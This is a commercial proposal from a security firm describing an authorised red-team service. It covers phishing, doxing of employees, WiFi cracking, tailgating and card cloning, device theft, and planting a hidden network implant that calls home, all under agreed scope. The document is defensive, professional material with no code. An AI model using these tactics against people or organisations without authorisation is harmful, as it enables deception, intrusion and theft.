The aim of this document is to provide an outline of the approach and testing
methods that Encription Limited would be authorised to conduct whilst providing our
THINK testing Service.
The approach will be progressive, from a completely passive engagement, to full
exploitation of systems and personnel (If agreed), and include:
- Open Source Intelligence Gathering.
- Phishing and Social Engineering Attacks against agreed targets.
- Perimeter and Internal Surveillance and attacks.
- WiFi cracking.
- Acquiring Assets and IPR.
- Application Reverse Engineering.
Prior to commencement of the service a scoping meeting will be held with the Client
to agree what is in scope and what is out of scope. What level of invasiveness and
disruption is acceptable will also be agreed. Similar scoping meetings would be held
throughout the project to agree or refine the approach/testing going forward.
The suggested time scales can be extended so that they capture more targets, or
reduced if it is deemed that fewer targets, or exercises, need to be in scope in order
to identify and understand the threats. It may also be prudent to split the exercises
into logical stages, and not proceed to the next stage until the results from the
previous stage have been evaluated, as this may affect the on-going targets and
The exercise will last over a three to six month elapsed period dependent upon
which elements are in scope, thus reflecting a true attack, where time is on the
attacker’s side. The Drop Box test for instance would be an elapsed time of 6
THreat INtelligence and Knowledge (THINK = KNOWLEDGE)
The Encription Limited THINK service provides a unique and ‘real world’ approach to assessing the
security of your organisation. The cyber threats posed to an organisation come from multiple
sources. Nation states, criminal gangs, political activists and recreational hackers are just some of
the threats that modern companies face today. Despite their different motives, all of these threat
actors have one advantage in common. Time.
A penetration test will ordinarily be conducted within a rigid time window with the full knowledge of the
IT staff and administrators. A THINK team test will typically occurs over a protracted period of time.
There are many reasons for this. Primarily this permits the testers the time to observe the targets
over a period of time and then to choose times when the attacks would be most effective, just as a
malicious attacker would. It will also permit us the opportunity to attempt multiple low scale assaults
to gain an understanding of the nature of the protections in place, and then to develop more robust
and effective attacks.
The THINK team may trigger active controls and countermeasures within a given operational
environment, providing a usable metric on how effective your internal processes and controls are, as
well as quantifying the level of functional defences in place.
Simulated attacks may be delivered in multiple formats. They may be electronic, against your internet
facing defences, social vectors against your staff or even physical assessments against your
- Mimics the activity of a malicious attacker far more accurately than a narrowly scoped
penetration test can.
- Assessment tactics will be developed over a period of time of observation of the Client’s
organisation, enabling the test team to fully bespoke activity.
- Will reveal to an organisation the true extent of their defences and will take into account the
security culture and readiness of the organisation as a whole.
After using the THINK Service the client should have a full understanding of their organisation’s risk
profile to a Cyber/internal attack and be able to put an effective security actions and on-going plan in
place thus making the client more secure.
- OSINT (open Source Intelligence) – Enumerating as much information that is Publicly/freely
available online that is associated with the Client’s digital footprint.
- Doxing – the art of finding as much information as possible about an individual, thus allowing
for further avenues of exploitation, such as phishing and targeted social engineering.
- Disgruntled and Targeted employees – from a list (including Emails) of employees provided
by THE CLIENT, Encription will attempt to engage and exploit the individuals to reveal
confidential information about THE CLIENT. The targets (probably 30) should include Director
level down to Clerical staff.
- External infrastructure assessment – The external facing infrastructure of the client will be
assessed from the view point of what an attacker would see. It will then be exploited if
possible. DOS attacks could be attempted, however this would need to be explicitly agreed
upon by the client. To ensure minimal disruption to live services, an agreed time and attack
vector would need to be agreed upon.
- VPN testing – if employees are connecting externally to the internal network, attempts can be
made to intercept traffic and test the cryptography levels of the secure tunnelling method
- Client side attacks – Internal and external –
Client side attacks require user interaction such as enticing them to click a link, open a
document, or somehow go to a malicious website. This can also be achieved with purposely
dropped USB’s and CD’s that allow for remote access to a victim machine that opens the
- Tech Support Attack – Particular attention will be given to the Technical support function in
an attempt to obtain confidential information which may be used in an attack.
- Cracking WiFi – through brute forcing methods, an attempt can be made to crack the
wireless key of an AP that is used on site. This can be attempted by intercepting a handshake
between a device and the AP, this would then be run through powerful GPU’s to attempt to
crack the key.
ON SITE ATTACKS/TESTING
- Physical access – The entire physical access of agreed offices and site locations can be
reviewed by means of gaining un authorised access. This can be done by tailgating, cloning
access cards or exploiting weak security measures. Authorised access methods can also be
tested via the means of attempting to arrange for testers under the guise of a fake persona, of
an air conditioning worker for example, to be granted access to a building. Once on-site
further exercises can take place see below.
- Server room access – once on site by any of the previously mentioned methods. Testers
can attempt to gain access to the server room and look for further potential vulnerabilities.
- Documents access – many documents are usually left insecure. A tester could attempt to
gain access to any of these documents that may reveal sensitive information. This exercise
can be carried out during and out of working hours.
- Obtaining network access – if testers can gain access to the internal network, through
DHCP or by gaining a static IP they can begin to make network vulnerability assessments.
Physical access would first need to be obtained.
- Internal network exploitation – if testers are able to gain access to the internal network,
they can begin to exploit known vulnerabilities that may be discovered during the vulnerability
assessment phase. This could include internal network client side attacks, as well as phishing
campaigns against staff. Proof of concept can be provided by leaving a “Calling Card” and
- Internal pen test – An agreed upon scope of internal testing can be arranged to allow for a
full internal penetration test from a black or white box perspective.
- Obtaining a device –This can be achieved by actually stealing a device (See below) or by
the client providing a device as though it had been stolen. This will allow for exploitation of
applications on the device, as well as revealing sensitive company information that may be
stored on the device.
- Hardware security – assessing the possibility of removing the client hardware from site will
allow for a true representation of what confidential information may be lost, if for example an
employee leaves a laptop, phone, etc. on a train.
- Obtaining app source code – If the source code of an application written by the client can
be obtained, this could highlight the possibility of a competitor acquiring the same information
and using it for their own monetary gain. This could be attempted once on-site.
- Social of engineering of staff – gaining sensitive information from employees such as
domain credentials, WiFi access codes and typical company security policies, will allow for
- Dropbox left on site – small credit card sized PC’s now have enough processing power to
intercept and re transmit data from an internal network over an SSH protocol. This is achieved
by placing a “Dropbox” on the network, this then monitors traffic and calls home to an
Encription secure server, allowing for remote traffic monitoring. These devices are discreet
and are designed to be hidden behind tower PC’s and other typical office furniture.
- Tiger – Tiger ransom/coercion style approaches are ‘significant’ in the methods employed as real-
time ‘Shock & awe’ is needed and cannot be approached faint heartedly.
These scenarios provide real time, real life feedback in relation to how a client and company
would respond to a real time security threat.